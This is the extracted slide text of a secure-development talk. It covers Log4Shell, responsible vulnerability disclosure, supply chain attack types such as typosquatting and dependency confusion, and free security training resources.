  • 24. CVE-2021-44228 (AKA LOG4SHELL) • Coordinated disclosure • Incomplete fix • More CVE's follow
  • 25. WHAT'S THE DIFFERENCE BETWEEN THESE LINES OF CODE?
  • 27. MOST OF THESE STORIES ARE UNTOLD Jeremy Long, founder of the OWASP Dependency Check project speculates that "only 25% of organizations report vulnerabilities to users, and only 10% of vulnerabilities are reported as Common Vulnerabilities exposure (CVE)." Sonatype State of the Software Supply Chain Report 2019
  • 29. HOW DO I DISCLOSE A VULNERABILITY IN A RESPONSIBLE WAY? • Company Website • Security files on servers • SECURITY.md • Github private vulnerability reporting
  • 30. Credit: Eddie Knight, Sonatype THE MANTRA 01 Does this touch the internet? If a feature touches the internet, we need to ensure end-to-end security from the supplier to the consumer 02 Does this take untrusted input? If a feature takes untrusted input, we need to validate it's integrity before use 03 Does this handle sensitive data? If a feature handles sensitive data, we must pay special care to encryption, handling, and storage.
  • 31.
  • 32.
  • 34. TYPES OF SUPPLY CHAIN ATTACKS • Typosquatting • Open source repo attacks • Build tool attacks • Dependency confusion org.leftpad vs org.leftpadd foo @ v1 foo @ v99999
  • 35. HOW FAST IS YOUR RELEASE PROCESS? Sonatype: State of the Software Supply Chain 2022
  • 37. RECAP • Vulnerability x Threat = Risk • CVE’s, CVSS, disclosure process • The Mantra/OWASP Top 10 • Dependency management • Release speed • Security champion programs
  • 38.
  • 39. THANK YOU BNY MELLON! • Linux Foundation free course Developing Secure Software https://training.linuxfoundation.org/training/devel oping-secure-software-lfd121/ • OWASP Webgoat Hands on with the OWASP Top 10 https://owasp.org/www-project-webgoat/ • Foojay security posts https://foojay.io/today/category/security/ • OWASP’s list of Free for Open Source Application Security Tools https://owasp.org/www- community/Free_for_Open_Source_Application_S ecurity_Tools Presentation Slides: @t_mammarella linkedin.com/in/tmammarella KEEP IN TOUCH: